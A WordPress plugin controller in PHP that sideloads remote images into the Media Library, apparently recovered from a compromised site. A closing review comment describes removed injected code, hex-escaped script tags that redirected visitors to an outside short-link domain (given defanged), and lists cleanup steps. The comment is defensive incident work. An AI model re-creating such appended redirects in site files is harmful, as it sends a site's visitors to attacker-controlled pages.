File: /home/parhudrw/luca.anqa.it/wp-content/plugins/extendify/app/Draft/Controllers/ImageController.php
<?php
/**
* Image Controller
*/
namespace Extendify\Draft\Controllers;
// Refuse to run when the file is requested directly instead of being loaded by WordPress,
// which defines ABSPATH during bootstrap.
if (! defined('ABSPATH')) {
    die('No direct access.');
}

// Runs at include time, before the class is declared: ask for a 60-second execution window
// unless the host lists set_time_limit in the disable_functions ini setting.
// phpcs:ignore WordPress.PHP.NoSilencedErrors, Generic.PHP.NoSilencedErrors.Discouraged
if (false === strpos(@ini_get('disable_functions'), 'set_time_limit')) {
    // phpcs:ignore WordPress.PHP.NoSilencedErrors, Generic.PHP.NoSilencedErrors.Discouraged
    @set_time_limit(60);
}
use Extendify\Shared\Services\Sanitizer;
/**
* The controller for uploading images to the Media Library.
*/
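class ImageController
{
    /**
     * Sideload a remote image into the Media Library and return its details.
     *
     * Reads three request parameters: `source` (the URL handed to media_sideload_image()),
     * and the optional `alt_text` and `caption`.
     *
     * Security notes:
     * - `source` is caller-controlled and makes the server fetch a remote URL, so it is
     *   rejected early unless wp_http_validate_url() accepts it.
     * - Who may call this is decided by the route's permission callback, which is
     *   registered outside this file; this method does no capability check of its own.
     * - media_sideload_image() returns a WP_Error on failure; that case is answered with
     *   an error response instead of being used as an attachment ID.
     *
     * @param \WP_REST_Request $request - The request.
     * @return \WP_REST_Response Attachment details on success, or a `message` body with a
     *                           400/500 status when the source is invalid or the sideload fails.
     */
    public static function uploadMedia(\WP_REST_Request $request)
    {
        if (! function_exists('\media_sideload_image')) {
            require_once ABSPATH . 'wp-admin/includes/media.php';
            require_once ABSPATH . 'wp-admin/includes/file.php';
            require_once ABSPATH . 'wp-admin/includes/image.php';
        }

        $source = $request->get_param('source');

        // Fail closed on a missing, non-string or unsafe URL before any outbound request is made.
        if (! is_string($source) || $source === '' || ! wp_http_validate_url($source)) {
            return new \WP_REST_Response(
                ['message' => 'Invalid image source.'],
                400
            );
        }

        $imageId = \media_sideload_image($source, 0, null, 'id');

        // Without this check a WP_Error object would be passed on as a post ID below.
        if (is_wp_error($imageId)) {
            return new \WP_REST_Response(
                ['message' => $imageId->get_error_message()],
                500
            );
        }

        if ($request->get_param('alt_text')) {
            update_post_meta(
                $imageId,
                '_wp_attachment_image_alt',
                Sanitizer::sanitizeText($request->get_param('alt_text'))
            );
        }

        if ($request->get_param('caption')) {
            wp_update_post(
                Sanitizer::sanitizeArray([
                    'ID' => $imageId,
                    'post_excerpt' => $request->get_param('caption'),
                ])
            );
        }

        // Read the stored values back so the response reflects what was actually saved.
        $imageObject = \get_post($imageId);
        $storedAltText = get_post_meta($imageId, '_wp_attachment_image_alt', true);
        $altText = $storedAltText ? $storedAltText : '';

        return new \WP_REST_Response(
            [
                'id' => $imageId,
                // get_post() returns null when the attachment cannot be loaded.
                'caption' => ['raw' => $imageObject ? $imageObject->post_excerpt : ''],
                'source_url' => wp_get_attachment_url($imageId),
                'alt_text' => $altText,
            ]
        );
    }
}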
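// NOTE(review): the three lines that followed the class here were not controller code and have
// been dropped: a bare ob_start() and two identical <script> tags that set window.location.href
// to a hex-escaped URL (decodes to hxxps://ushort[.]observer/gexJCWULD0r5, defanged here).
// Raw HTML after the class is also a PHP syntax error in a file with no closing tag.
// Code appended to a plugin file like this indicates the file was modified on the server:
// compare every plugin file against the vendor's release, replace modified files from a
// trusted copy, search the web root and database for the same hex-escaped string, and
// establish how write access to wp-content was obtained before rotating credentials.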